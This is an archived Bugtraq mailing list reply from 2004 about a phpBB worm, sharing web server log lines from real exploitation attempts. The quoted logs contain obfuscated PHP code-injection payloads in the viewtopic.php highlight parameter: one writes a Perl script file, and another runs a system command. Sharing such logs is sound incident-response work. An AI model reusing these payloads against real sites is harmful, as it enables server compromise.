lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <TheMailAgent.11de56483efee6@d204d1468a1155fbcc2b>
Date: Wed, 22 Dec 2004 17:21:22 +0200 (IST)
From: Alexander Klimov <alserkli@...ox.ru>
To: Shannon Lee <shannon@...hostworks.net>
Cc: bugtraq@...urityfocus.com
Subject: Re: phpBB Worm


On Mon, 20 Dec 2004, Shannon Lee wrote:
> After some investigation, we determined that the attacker had gained
> access via phpbb in a series of crafted URL requests, like so:
>
> 64.235.234.84 - - [20/Dec/2004:08:41:35 -0800] "GET
> /viewtopic.php?p=9002&sid=f5
> 399a2d243cead3a5ea7adf15bfc872&highlight=%2527%252Efwrite(fopen(chr(109)%252echr
> (49)%252echr(104)%252echr(111)%252echr(50)%252echr(111)%252echr(102),chr(97)),ch
> r(35)%252echr(33)%252echr(47)%252echr(117)%252echr(115)%252echr(114)%252echr(47)
> %252echr(98)%252echr(105)%252echr(110)%252echr(47)%252echr(112)%252echr(101)%252
> echr(114)%252echr(108)%252echr(10)%252echr(117)%252echr(115)%252echr(101)%252ech
> r(32)),exit%252e%2527 HTTP/1.0" 200 13648 "http://forum.CLIENT SITE
> OMITTED.com/

It seems that automated exploiting starts soon after disclosure of the
vulnerability:

62.221.209.145 - - [24/Nov/2004:14:09:05 +0200]
"GET /viewtopic.php?t=50674&highlight=
%2527%252esystem(chr(100)%252echr(105)%252echr(114))%252edie()%252e%2527
HTTP/1.1" 404 219

Interestingly, we do not use phpbb and in fact do not have viewtopic.php at all.

-- 
Regards,
ASK


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ